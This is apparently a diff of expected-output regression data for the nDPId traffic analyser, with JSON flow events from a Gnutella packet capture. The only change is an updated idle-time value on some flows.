00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":82060,"flow_last_seen":493283,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"115.69.62.99","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":373494,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.68.255","src_port":28681,"dst_port":12838,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":756,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":373494,"flow_last_seen":551890,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.100.68.255","src_port":28681,"dst_port":12838,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.39.233","src_port":28681,"dst_port":20855,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":790,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":493288,"flow_last_seen":493288,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.164.39.233","src_port":28681,"dst_port":20855,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86640,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86640,"flow_last_seen":95653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00570{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00555{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":70171,"flow_last_seen":79201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"112.105.52.2","src_port":50239,"dst_port":6384,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86640,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":86640,"flow_last_seen":95653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.231.59.187","src_port":50278,"dst_port":62234,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490658,"flow_last_seen":490658,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":766,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":490658,"flow_last_seen":490658,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.119.55.28","src_port":28681,"dst_port":20347,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433135,"flow_last_seen":433135,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.170.209.214","src_port":28681,"dst_port":46210,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00564{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":433135,"flow_last_seen":433135,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.170.209.214","src_port":28681,"dst_port":46210,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"finished","flow_packets_processed":295,"flow_first_seen":90745,"flow_last_seen":593624,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":9996,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90745,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90745,"flow_last_seen":99778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00801{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":288,"flow_state":"finished","flow_packets_processed":295,"flow_first_seen":90745,"flow_last_seen":593624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":9996,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":50312,"dst_port":23548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":72265,"flow_last_seen":81294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.127.1.235","src_port":50251,"dst_port":37814,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":73300,"flow_last_seen":82326,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.48.23","src_port":50257,"dst_port":3054,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00574{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90745,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00559{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":286,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":90745,"flow_last_seen":99778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.110.153.177","src_port":50310,"dst_port":40022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00571{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00556{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":63002,"flow_last_seen":72031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00558{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":66078,"flow_last_seen":75077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.86.162","src_port":50217,"dst_port":54958,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00578{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82058,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.166.226.70","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00563{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":82058,"flow_last_seen":491980,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.166.226.70","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.152.66.153","src_port":50194,"dst_port":43771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.152.66.153","src_port":50194,"dst_port":43771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00572{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.152.66.153","src_port":50194,"dst_port":43771,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00557{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":61975,"flow_last_seen":61975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.152.66.153","src_port":50194,"dst_port":43771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":70230,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.131.85.245","src_port":28681,"dst_port":31743,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":7491,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":70230,"flow_last_seen":493284,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":599747,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.131.85.245","src_port":28681,"dst_port":31743,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 